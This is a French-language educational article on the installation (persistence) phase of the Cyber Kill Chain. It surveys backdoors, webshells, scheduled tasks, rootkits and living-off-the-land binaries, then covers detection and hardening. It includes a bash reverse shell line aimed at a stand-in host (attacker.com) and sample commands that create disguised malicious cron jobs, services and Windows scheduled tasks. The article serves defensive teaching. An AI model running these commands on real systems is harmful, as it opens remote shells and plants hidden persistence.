Phase 5 - L'installation

Une fois l’exploitation réussie, l’attaquant doit consolider sa position. La phase d’installation consiste à déployer des outils qui garantissent un accès durable au système compromis. Sans cette étape, l’intrusion serait éphémère — un simple redémarrage pourrait tout effacer.

Cette phase est critique pour l’attaquant : c’est le moment où il transforme un accès temporaire en présence permanente. C’est aussi une fenêtre d’opportunité pour les défenseurs qui savent quoi surveiller.

Qu’est-ce que la phase d’installation ?

La phase d’installation (parfois appelée “persistance”) est le moment où l’attaquant implante des outils et mécanismes pour :

• Maintenir l’accès même après un redémarrage ou une déconnexion
• Survivre aux mises à jour et aux actions de remédiation basiques
• Faciliter le retour en cas de détection partielle
• Préparer les phases suivantes (C2, mouvement latéral)

L’objectif est de devenir un “résident permanent” du système, invisible et difficile à déloger.

Techniques de persistance

Backdoors et webshells

Une backdoor est un point d’accès caché qui permet de contourner l’authentification normale :

• Webshells : scripts PHP, ASP ou JSP déposés sur un serveur web
• Reverse shells : connexions sortantes vers l’attaquant
• Implants mémoire : code résidant uniquement en RAM (fileless)

# Exemple de reverse shell basique (à des fins éducatives)
bash -i >& /dev/tcp/attacker.com/4444 0>&1

Webshells

Les webshells sont particulièrement dangereux car ils utilisent le port 80/443, généralement autorisé par les pare-feux, et se fondent dans le trafic web légitime.

Modification des mécanismes d’authentification

L’attaquant peut altérer les systèmes d’authentification pour garantir son accès :

Technique	Description	Détection
Ajout d’utilisateur	Création d’un compte administrateur	Audit des créations de comptes
Clé SSH autorisée	Ajout dans ~/.ssh/authorized_keys	Monitoring des fichiers SSH
Skeleton Key	Mot de passe universel sur AD	Analyse mémoire du DC
Golden Ticket	Ticket Kerberos forgé	Analyse des tickets anormaux

Tâches planifiées et services

Les mécanismes de planification du système sont détournés pour exécuter du code malveillant :

Linux :

# Crontab malveillant
* * * * * /tmp/.hidden/beacon.sh

# Service systemd
[Service]
ExecStart=/usr/local/bin/legitimate-looking-name

Windows :

# Tâche planifiée
schtasks /create /tn "WindowsUpdate" /tr "C:\Windows\Temp\update.exe" /sc onstart

# Service Windows
sc create "Windows Defender Update" binpath= "C:\malware.exe"

Modification du démarrage

L’attaquant s’assure que son code s’exécute à chaque démarrage :

• Clés de registre Run/RunOnce (Windows)
• Scripts rc.local ou init.d (Linux)
• Modification du bootloader (rootkits avancés)
• WMI Event Subscriptions (Windows)
• Login hooks et LaunchAgents (macOS)

Techniques “Living off the Land”

Plutôt que d’installer des outils, l’attaquant utilise ceux déjà présents sur le système — c’est le concept de GTFOBins et LOLBins :

• PowerShell : téléchargement et exécution de scripts
• Certutil : décodage de payloads encodés
• Bitsadmin : transfert de fichiers
• Regsvr32 : exécution de code via DLL

Ces techniques sont difficiles à détecter car elles utilisent des binaires légitimes signés par Microsoft ou le vendeur du système.

Outils couramment déployés

RAT (Remote Access Trojans)

Les RAT offrent un contrôle complet à distance :

• Fonctionnalités : shell, capture d’écran, keylogger, webcam, fichiers
• Exemples connus : Cobalt Strike Beacon, Meterpreter, njRAT, DarkComet
• Caractéristique : interface graphique pour l’attaquant

Implants modulaires

Les frameworks modernes utilisent des implants modulaires qui téléchargent uniquement les fonctionnalités nécessaires :

• Avantage : empreinte minimale, difficile à détecter
• Fonctionnement : noyau minimal + modules chargés à la demande
• Exemples : Cobalt Strike, Brute Ratel, Sliver

Rootkits

Les rootkits s’intègrent profondément dans le système pour masquer leur présence :

• User-mode rootkits : modification des bibliothèques systèmes
• Kernel-mode rootkits : modification du noyau
• Bootkits : infection du processus de démarrage

Comment détecter l’installation ?

Surveillance des fichiers critiques

Monitorer les modifications dans les zones sensibles :

Windows :
- C:\Windows\System32\
- C:\Windows\Tasks\
- Registre (Run, Services)
- %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup

Linux :
- /etc/cron.*
- /etc/systemd/system/
- ~/.ssh/authorized_keys
- /etc/passwd, /etc/shadow

Analyse des processus et services

• Processus avec des noms légitimes lancés depuis des chemins inhabituels
• Services récemment créés ou modifiés
• Processus orphelins ou avec un parent suspect
• Connexions réseau depuis des processus inattendus

Outils de détection

Outil	Usage
AIDE	Intégrité des fichiers (Linux)
Autoruns	Analyse des points de persistance (Windows)
OSQuery	Requêtes SQL sur l’état du système
Velociraptor	Forensics et hunting à grande échelle

Comment se protéger ?

Contrôle d’intégrité

• Déployer un HIDS (Host-based Intrusion Detection System)
• Hasher les binaires critiques et vérifier régulièrement
• Utiliser des systèmes immuables quand possible

Restriction des privilèges

• Moindre privilège pour tous les comptes
• Contrôler qui peut créer des services et tâches planifiées
• Limiter l’accès aux répertoires sensibles
• Bloquer l’exécution depuis les répertoires temporaires

Durcissement système

• AppArmor ou SELinux sur Linux
• Windows Defender Application Control (WDAC)
• Désactiver PowerShell v2 et les protocoles obsolètes
• Activer la signature des scripts

Logging et audit

• Activer l’audit des créations de processus (Windows Event 4688)
• Logger les commandes PowerShell (ScriptBlock Logging)
• Centraliser les logs avec un SIEM
• Alerter sur les comportements suspects

À retenir

1. L’installation transforme un accès temporaire en présence durable — c’est la phase où l’attaquant “s’enracine”

2. Les techniques de persistance sont nombreuses — il faut surveiller plusieurs vecteurs simultanément

3. Living off the Land rend la détection difficile car les outils utilisés sont légitimes

4. La surveillance des fichiers critiques est essentielle pour détecter les implants

5. Le durcissement préventif (moindre privilège, contrôle d’exécution) limite les options de l’attaquant

6. Les logs sont votre meilleur allié — sans visibilité, pas de détection

Liens utiles

• GTFOBins : binaires détournés
• Moindre privilège
• AIDE (HIDS)
• Phase suivante : Command & Control